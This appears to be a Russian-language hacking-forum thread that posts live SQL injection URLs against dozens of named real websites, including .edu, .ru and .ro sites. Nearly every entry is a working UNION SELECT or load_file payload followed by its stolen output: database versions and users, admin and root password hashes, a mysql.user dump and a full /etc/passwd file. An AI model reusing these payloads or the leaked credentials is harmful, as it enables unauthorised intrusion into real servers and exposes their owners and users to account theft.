SQL Инъекции

http://megaspace.com.br/base.php?menuId=5&categoriaPaiId=-1+union+select+1,load_file('/etc/passwd'),3/*

Кратко и ясно =)

 

http://avers33.ru

http://avers33.ru/view_articles.php?id=-47'+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14--+
Database Version:5.0.37
Login: planer
password:
email: [email protected]
Database name: avers33ru

 

http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('UTILIS_Stats_Browsers'))--

Database Version:Microsoft SQL Server 2005 - 9.00.1406.00
Database name:art
User name:LMYS-S01\IUSR_LMYS-S01
-----------------------------------------------------------------------
-----------------------------------------------------------------------
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('UTILIS_Stats_Browsers','UTILIS_Stats_Config','UTILIS_Stats_OSes','UTILIS_Stats_Paths','UTILIS_Stats_Refs','UTILIS_Stats_Stats','Content','Dealers','Distributors','FAQ','FAQ_Sections','File_Categories','Files','Friends','Misc_Content','Press_Releases','Product_Categories','Product_Models','Product_Types','Reviews','Specs_ARTcessories','Specs_Audio_Utilities','Specs_Crossovers','Specs_Digital_Converters','Specs_Direct_Boxes','Specs_DSP','Specs_Effects_Processors','Specs_Graphic_EQ','Specs_Mic_Paks','Specs_Mic_Preamps','Specs_Power_Amps','Specs_Power_Conditioners','Specs_Studio_Monitors','Specs_Tube_Compressors','Splash_Content','Splash_Intros','UTILIS_Access_Level','UTILIS_Config','UTILIS_Mail_Categories','UTILIS_Mail_Clients','UTILIS_Mailing_List','UTILIS_Permissions','UTILIS_Preferences','UTILIS_Users'))--
-----------------------------------------------------------------------
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+User_name+from+UTILIS_Users)--
http://www.artproaudio.com/products.asp?id=1+or+1=(SELECT+TOP+1+password+from+UTILIS_Users)--
-----------------------------------------------------------------------

'whelman' 'YXN0cmFs'​

 

Странно(=.

Code:

http://budutdeti.ru/php/content.php?group=3&id=-79+union+select+1,concat_ws(0x3a,pass,login),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+users+--+

о_О

Code:

2:1

 

http://www.primariacurtici.ro/?x=arata_articol&id=-220+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9



Database Version: 4.1.22-standard-log
Database name: primaria_curtici
User name: primaria_curtici@localhost

 

http://www.frndz.biz/page.php?ID=-5+union+select+1,2/*

Database Version: 4.1.22-standard
Database name: signdrop_FRNDZ
User name: signdrop_frndz@localhost

 

http://www.primariagiarmata.ro/stiri_view.php?ID=-7+union+select+1,version(),database(),user()


Database Version: 4.1.22-standard
User name: domvisio_giarmata
User name: domvisio_giarmat@localhost

 

Code:

http://www.andrewjones.com.au/media.centre/calendar/event.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--

версия/юзер/бд:

Code:

 5.0.67-community-log:netcon_cmsuser@localhost:netcon_cms

-----------------------------------------------------------------------------------------------------------------------------
The End!

 

auction.mxc.ru

PHP:

http://auction.mxc.ru/?chap=viewgood&id=275+union+select+1,2,3,concat_ws(0x3A,@@version,user(),database()),5--+


5.0.32-Debian_7etch6-log
auction_user@localhost
auction_mxc_ruр

www.truck.ru PR-4 ТиЦ - 650

PHP:

http://www.truck.ru/statiy.php?art=-8589+union+select+1,2,3,concat_ws(0x3A,username,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+truck.phpbb_users+where+user_level=1+--+


админ(хеш так и не побрутил):
x86:d71fcaf80885603f64d1648b509438b3

6 Версия мускуля, впервые встречаю в живой природе-

PHP:

http://sorter.ru/popup_mes.cph?idmes=496260+union+select+concat_ws(0x3A,user(),version(),database())--+


SORTER@LOCALHOST
6.0.9-ALPHA-LOG
SORTER_ANNOUN

 

Code:

http://www.irmca.org/memberinfo.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14--

версия/юзер/бд:

Code:

 4.0.12-nt:admin_irmca@localhost:irmca_org_-_content 

----------------------------------------------------------------------

Code:

http://www.plm-conference.org/index.php?section=-1+union+all+select+0,1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13--

версия/юзер/бд:

Code:

5.0.32-Debian_7etch1:[email protected]:plmconfe66633

вывод в <title></title>

-----------------------------------------------------------------------------------------------------------------------------
The End!

 

Ассоциация специалистов восстановительной медицины

Code:

http://www.asvomed.ru/php/content.php?id=-452+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19+from+u16011_2.admin--&pr=print

 

www.usedcardboardboxes.com pr 5

Code:

http://www.usedcardboardboxes.com/static_page.php?id=-3%20union%20select%201,load_file(0x2f6574632f706173737764),group_concat(0x7c,user,0x7c,password,0x7c,file_priv,0x7c,user(),0x7c)%20from%20mysql.user

File priv: Y
User : root@localhost


|root|42485fd03777dfd3|Y|root@localhost|
|chevy|2e967e45483f29fe|N|root@localhost|
|ppuricelli|0779d42331d4f0c3|N|root@localhost|
|cc_root|33f9b4321d694b20|N|root@localhost|

/etc/passwd

Code:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/bin/true
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin
canna:x:39:39:Canna Service User:/var/lib/canna:/sbin/nologin
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
tomcat4:x:101:102:Tomcat4:/var/tomcat4:/bin/bash
majordomo:x:91:91:Majordomo List Manager:/usr/lib/majordomo:/bin/bash
fpweb:x:500:500::/home/fpweb:/bin/bash
clamav:x:102:103:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
vhbackup:x:501:501::/home/vhbackup:/bin/bash
admin60:x:502:502::/home/virtual/site60/fst:/bin/false
admin19:x:506:506::/home/virtual/site19/fst:/bin/false
admin25:x:507:507::/home/virtual/site25/fst:/bin/false
admin14:x:508:508::/home/virtual/site14/fst:/bin/false
admin49:x:510:510::/home/virtual/site49/fst:/bin/false
admin74:x:511:511::/home/virtual/site74/fst:/bin/false
admin99:x:513:513::/home/virtual/site99/fst:/bin/false
admin96:x:514:514::/home/virtual/site96/fst:/bin/false
admin79:x:515:515::/home/virtual/site79/fst:/bin/false
admin94:x:516:516::/home/virtual/site94/fst:/bin/false
admin22:x:517:517::/home/virtual/site22/fst:/bin/false
admin3:x:518:518::/home/virtual/site3/fst:/bin/false
admin24:x:519:519::/home/virtual/site24/fst:/bin/false
admin35:x:520:520::/home/virtual/site35/fst:/bin/false
admin95:x:521:521::/home/virtual/site95/fst:/bin/false
admin33:x:522:522::/home/virtual/site33/fst:/bin/false
admin50:x:523:523::/home/virtual/site50/fst:/bin/false
admin82:x:524:524::/home/virtual/site82/fst:/bin/false
admin36:x:526:526::/home/virtual/site36/fst:/bin/false
admin43:x:528:528::/home/virtual/site43/fst:/bin/false
admin12:x:529:529::/home/virtual/site12/fst:/bin/false
admin91:x:531:531::/home/virtual/site91/fst:/bin/false
admin54:x:535:535::/home/virtual/site54/fst:/bin/false
admin90:x:538:538::/home/virtual/site90/fst:/bin/false
admin20:x:540:540::/home/virtual/site20/fst:/bin/false
admin97:x:541:541::/home/virtual/site97/fst:/bin/false
admin21:x:542:542::/home/virtual/site21/fst:/bin/false
admin83:x:543:543::/home/virtual/site83/fst:/bin/false
admin2:x:545:545::/home/virtual/site2/fst:/bin/false
admin77:x:548:548::/home/virtual/site77/fst:/bin/false
admin29:x:549:549::/home/virtual/site29/fst:/bin/false
admin73:x:550:550::/home/virtual/site73/fst:/bin/false
admin6:x:551:551::/home/virtual/site6/fst:/bin/false
admin4:x:552:552::/home/virtual/site4/fst:/bin/false
admin7:x:553:553::/home/virtual/site7/fst:/bin/false
admin52:x:554:554::/home/virtual/site52/fst:/bin/false
admin30:x:555:555::/home/virtual/site30/fst:/bin/false
admin51:x:556:556::/home/virtual/site51/fst:/bin/false
admin102:x:562:562::/home/virtual/site102/fst:/bin/false
admin32:x:563:563::/home/virtual/site32/fst:/bin/false
admin26:x:564:564::/home/virtual/site26/fst:/bin/false
admin76:x:565:565::/home/virtual/site76/fst:/bin/false
admin39:x:567:567::/home/virtual/site39/fst:/bin/false
admin31:x:570:570::/home/virtual/site31/fst:/bin/false
admin27:x:572:572::/home/virtual/site27/fst:/bin/false
admin93:x:573:573::/home/virtual/site93/fst:/bin/false
admin44:x:574:574::/home/virtual/site44/fst:/bin/false
admin101:x:576:576::/home/virtual/site101/fst:/bin/false
admin88:x:577:577::/home/virtual/site88/fst:/bin/false
admin38:x:578:578::/home/virtual/site38/fst:/bin/false
admin85:x:579:579::/home/virtual/site85/fst:/bin/false
admin28:x:581:581::/home/virtual/site28/fst:/bin/false
admin42:x:582:582::/home/virtual/site42/fst:/bin/false
admin64:x:583:583::/home/virtual/site64/fst:/bin/false
admin41:x:584:584::/home/virtual/site41/fst:/bin/false
admin75:x:586:586::/home/virtual/site75/fst:/bin/false
admin70:x:587:587::/home/virtual/site70/fst:/bin/false
admin8:x:589:589::/home/virtual/site8/fst:/bin/false
admin53:x:590:590::/home/virtual/site53/fst:/bin/false
admin13:x:591:591::/home/virtual/site13/fst:/bin/false
admin1:x:592:592::/home/virtual/site1/fst:/bin/false
admin10:x:593:593::/home/virtual/site10/fst:/bin/false
admin89:x:594:594::/home/virtual/site89/fst:/bin/false
admin11:x:595:595::/home/virtual/site11/fst:/bin/false
admin67:x:596:596::/home/virtual/site67/fst:/bin/false
admin23:x:597:597::/home/virtual/site23/fst:/bin/false
admin80:x:598:598::/home/virtual/site80/fst:/bin/false
admin5:x:599:599::/home/virtual/site5/fst:/bin/false
admin34:x:600:600::/home/virtual/site34/fst:/bin/false
admin15:x:601:601::/home/virtual/site15/fst:/bin/false
admin46:x:604:604::/home/virtual/site46/fst:/bin/false
admin48:x:605:605::/home/virtual/site48/fst:/bin/false
admin55:x:606:606::/home/virtual/site55/fst:/bin/false
admin57:x:607:607::/home/virtual/site57/fst:/bin/false
admin58:x:608:608::/home/virtual/site58/fst:/bin/false
admin9:x:610:610::/home/virtual/site9/fst:/bin/false
admin59:x:611:611::/home/virtual/site59/fst:/bin/false
admin61:x:612:612::/home/virtual/site61/fst:/bin/false
admin62:x:613:613::/home/virtual/site62/fst:/bin/false
admin65:x:615:615::/home/virtual/site65/fst:/bin/false
admin66:x:616:616::/home/virtual/site66/fst:/bin/false
admin68:x:617:617::/home/virtual/site68/fst:/bin/false
admin69:x:618:618::/home/virtual/site69/fst:/bin/false
admin71:x:619:619::/home/virtual/site71/fst:/bin/false
admin72:x:620:620::/home/virtual/site72/fst:/bin/false
admin81:x:621:621::/home/virtual/site81/fst:/bin/false
admin37:x:622:622::/home/virtual/site37/fst:/bin/false
admin16:x:623:623::/home/virtual/site16/fst:/bin/false
admin17:x:624:624::/home/virtual/site17/fst:/bin/false
admin18:x:625:625::/home/virtual/site18/fst:/bin/false
admin40:x:626:626::/home/virtual/site40/fst:/bin/false
admin45:x:627:627::/home/virtual/site45/fst:/bin/false

 

http://www.pntcd-bihor.ro/evenim_recente.php?id=-63+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4--



Database Version: 5.0.51a-community-log
Database name: pntcd_bihor
User name: pntcd@localhost

 

.edu от меня))))


Сайт

www.opsu.edu

OPSU Home

Database Version: 4.1.21
Database name: opsu
User name: www-opsu@localhost

ТИЦ: 10
PR: 6
________________________________________________________________________


Сайт

www.lagunacollege.edu

Laguna College of Art and Design

Database Version: 5.0.37-log
Database name: lcad
User name: [email protected]

ТИЦ: 0
PR: 5

 

Code:

http://ventura.rudtp.ru/articles.php?id=-5+union+select+1,2,3,concat(version(),0x3a,user())

Code:

http://www.toys-house.ru/articles.php?id=-5+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7+from+phpbb_users+limit+1,1

 

http://www.jonaschalk.neu.edu/search_archives/display.php?id=-75+union+select+passone,2,3,4+from+cmc.users/*

http://www.jonaschalk.neu.edu/search_archives/display.php?id=-75+union+select+concat(user(),0x3a,version()),2,3,4+from+cmc.users/*

edtech@localhost:5.0.45

 

manchester-center.com PR=4

Code:

http://www.manchester-center.com/news.php?ax=v&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

Version:4.1.22-standard
User:manchest_user@localhost
Database: manchest_cms

 

Code:

http://www.klen-net.ru/index.php?page=7&action=71&article_id=99999+union+select+concat_ws(0x3a,version(),database( ),user())--&type_news=15&key_view=Y

Database Version : 4.0.27
Database name : klenhost
User name : [email protected]

админ :

Code:

http://www.klen-net.ru/index.php?page=7&action=71&article_id=99999+union+select+conca t_ws(0x3a,user ,password)+from+mysql.user--

Code:

root:50884e13230c9c77

file_priv Y

Весь вывод в title.

 

http://www.snagov.ro/ro/index.php?s=-321+union+select+1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6


Database Version: 5.0.45
Database name: snagov
User name: snagov@localhost


http://www.snagov.ro/ro/index.php?s=-321+union+select+1,concat_ws(0x3a,memberName,passwd),3,4,5,6+FROM+snagov.smf_members+limit+x,1/*

x=0...19

snagov:62fdef2f28e57e4ac2e54bb2b41cd99cea3535ca
ct:36fe922b2c4988cae4265e0519b0a3e4
stefan:67d75265eed103d1445e21d56cc7a4bc
dioprea:4ec8089aabd87717340b49c15f64f963
dorel:4772ec50b3d82b89b52515e1cc3807f4
222:4cc931b5fe8a077c94480fede5dfd8ce

 

Code:

http://www.ruswood.ru/index.php?go=news&id=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4--

Database Version : 4.1.22-log
Database name : wwweugineru_ruswood
User name : [email protected]